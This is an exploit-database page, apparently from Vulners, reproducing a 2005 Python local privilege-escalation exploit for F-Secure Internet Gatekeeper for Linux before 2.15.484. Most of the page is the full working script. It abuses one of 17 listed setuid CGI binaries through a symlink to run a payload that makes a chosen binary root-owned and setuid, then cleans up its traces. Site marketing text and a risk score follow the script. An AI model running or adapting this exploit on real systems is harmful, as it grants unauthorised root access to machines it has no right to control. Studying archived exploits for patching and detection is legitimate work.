Vulners
Lucene search
F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation
#!/usr/bin/env python
#
# F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484
# F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke
#
##############################################################################
## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit
## acknowledgements: everyone in pure-elite and uDc.
##
## coded by: [email protected] [http://xavsec.blogspot.com]
##############################################################################
##############################################################################
## Make proper checks and import nessesary calls from modules.
##
try:
from sys import argv
except Exception:
print "the 'sys' module could not be loaded"
raise SystemExit
try:
from os import unlink, stat, error, symlink, system, chmod
except Exception:
print "the 'os' module could not be loaded"
raise SystemExit
try:
import getopt
except Exception:
print "the 'getopt' module could not be loaded"
raise SystemExit
##############################################################################
## Constants.
##
__program__ = argv[0]
__version__ = "0.1beta"
__author__ = "<[email protected]>"
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
__usage__ = """usage: %s [-options]
options:
--version show program's version number and exit.
-h, --help show this help message and exit.
-s, --suid file location to suid.
-d, --dir cgi directory.
-c, --clean cleans any left over files from the environment creation.
-# enter numerical value of vulnerable file to exploit. [list below]
1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi
4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi
7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi
10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi
13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi
16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)
#######################################################################################
## Functions.
##
def _write(file, payload):
try:
open(file, 'w').write(payload)
chmod(file, 0100)
except Exception, err:
print ("[-] %s" % (err))
def _exists(path):
try:
stat(path)
except error:
return False
return True
def _handleopts():
for opt in argv[1:]:
if opt in ("-h", "--help"):
print "%s" % (__usage__),
raise SystemExit
if opt in ("-v", "--version"):
print "%s (%s)" % (__version__, __lastedit__),
raise SystemExit
_method_ = 'ifconfig_suid.cgi'
_file_ = 'ifconfig.cgi'
for opt in argv[1:]:
if opt == "-1":
_method_ = 'ifconfig_suid.cgi'
elif opt == "-2":
_method_ = 'reboot_suid.cgi'
_file_ = 'reboot.cgi'
elif opt == "-3":
_method_ = 'proxy_suid.cgi'
_file_ = 'proxy.cgi'
elif opt == "-4":
_method_ = 'edittmpl_suid.cgi'
_file_ = 'edittmpl.cgi'
elif opt == "-5":
_method_ = 'version_suid.cgi'
_file_ = 'version.cgi'
elif opt == "-6":
_method_ = 'hostname_suid.cgi'
_file_ = 'hostname.cgi'
elif opt == "-7":
_method_ = 'gateway_suid.cgi'
_file_ = 'gateway.cgi'
elif opt == "-8":
_method_ = 'halt_suid.cgi'
_file_ = 'halt.cgi'
elif opt == "-9":
_method_ = 'edituserdb_suid.cgi'
_file_ = 'edituserdb.cgi'
elif opt == "-10":
_method_ = 'htpasswd_suid.cgi'
_file_ = 'htpasswd.cgi'
elif opt == "-11":
_method_ = 'pattern_up_suid.cgi'
_file_ = 'pattern_up.cgi'
elif opt == "-12":
_method_ = 'license_suid.cgi'
_file_ = 'license.cgi'
elif opt == "-13":
_method_ = 'iptables_suid.cgi'
_file_ = 'iptables.cgi'
elif opt == "-14":
_method_ = 'dns_suid.cgi'
_file_ = 'dns.cgi'
elif opt == "-15":
_method_ = 'pattern_autoup_suid.cgi'
_file_ = 'pattern_autoup.cgi'
elif opt == "-16":
_method_ = 'spam_list_suid.cgi'
_file_ = 'spam_list.cgi'
elif opt == "-17":
_method_ = 'diag_suid.cgi'
_file_ = 'diag.cgi'
else:
pass
try:
opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \
'suid=', \
'dir='])[0]
except Exception, (err):
print "[-] %s" % (err),
raise SystemExit
_dir_ = None
_payload_ = None
_combine_ = None
for o, a in opts:
if o in ("-c", "--clean"):
_clean()
print "[*] done"
raise SystemExit
if o in ("-d", "--dir"):
if _exists(a):
_dir_ = a
else:
print "[-] unable to access the %s directory" % (_dir_),
raise SystemExit
if o in ("-s", "--suid"):
if _exists(a):
_payload_ = _suid(a)
else:
print "[-] unable to access binary."
raise SystemExit
if _dir_ == None:
print "[-] no directory was given [try -h for help menu]"
raise SystemExit
if _payload_ == None:
print "[-] enter binary to suid [try -h for help menu]"
raise SystemExit
_combined_ = "%s/%s" % (_dir_, _method_)
if not _exists(_combined_):
print "[-] method not possible, try another."
raise SystemExit
print "[*] creating environment..."
try:
symlink('%s/%s' % (_dir_, _method_), 'runbad')
_write(_file_, _payload_)
except Exception, err:
raise SystemExit
def _suid(file):
_suid_ = """#!/bin/sh
chown 0.0 %(file)s
chmod 4755 %(file)s
""" % (locals())
return _suid_
def _clean():
try:
files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi',
'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',
'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',
'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi',
'spam_list.cgi', 'diag_suid.cgi']
for file in files:
if _exists(file): unlink(file)
except Exception, err:
print "[-] %s" % (err),
##############################################################################
## main() // main code.
##
def main():
try:
print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)
print "[*] handling options, arguments..."
_handleopts()
print "[*] executing exploit..."
system('./runbad')
print "[*] cleaning..."
_clean()
print "[*] done... try executing the specified binary."
except KeyboardInterrupt:
print "[-] caught keyboard interuption"
raise SystemExit
except Exception, (err):
_clean()
raise SystemExit
if __name__ == '__main__': main()
# milw0rm.com [2005-11-07]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Nov 2005 00:00Current
7.4High risk
Vulners AI Score7.4